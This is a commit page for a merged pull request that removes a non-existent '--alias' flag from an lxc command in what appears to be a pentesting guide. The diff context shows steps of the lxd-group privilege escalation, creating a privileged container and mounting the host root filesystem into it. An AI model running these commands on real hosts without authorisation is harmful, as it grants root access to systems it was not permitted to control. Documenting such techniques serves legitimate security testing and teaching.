Merge pull request #641 from wonda-tea-coffee/fix-lxc-command

Delete non-existent flags
This commit is contained in:
Carlos Polop 2023-05-26 11:36:19 +02:00 committed by GitHub
commit d03ebfbcfc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -50,7 +50,7 @@ lxc image list #You can see your new imported image
Create a container and add root path
```bash
lxc init alpine privesc -c security.privileged=true --alias=alpine
lxc init alpine privesc -c security.privileged=true
lxc list #List containers
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true